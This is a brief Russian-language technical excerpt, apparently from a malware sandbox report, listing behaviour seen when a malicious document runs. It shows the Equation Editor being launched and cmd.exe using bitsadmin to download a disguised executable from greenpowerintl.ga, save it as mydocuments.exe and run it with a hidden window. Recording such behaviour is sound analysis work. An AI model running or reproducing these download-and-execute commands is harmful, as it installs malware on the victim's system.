Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer hE /priority foreground http://greenpowerintl.ga/juice/juice.jpg %USERPROFILE%\mydocuments.exe && start %USERPROFILE%\mydocuments.exe & bitsadmin /transfer oq /priority f...
- DNS ASK gr####owerintl.ga
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer hE /priority foreground http://greenpowerintl.ga/juice/juice.jpg %USERPROFILE%\mydocuments.exe && start %USERPROFILE%\mydocuments.exe & bitsadmin /transfer oq /priority f...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer hE /priority foreground http://greenpowerintl.ga/juice/juice.jpg %HOMEPATH%\mydocuments.exe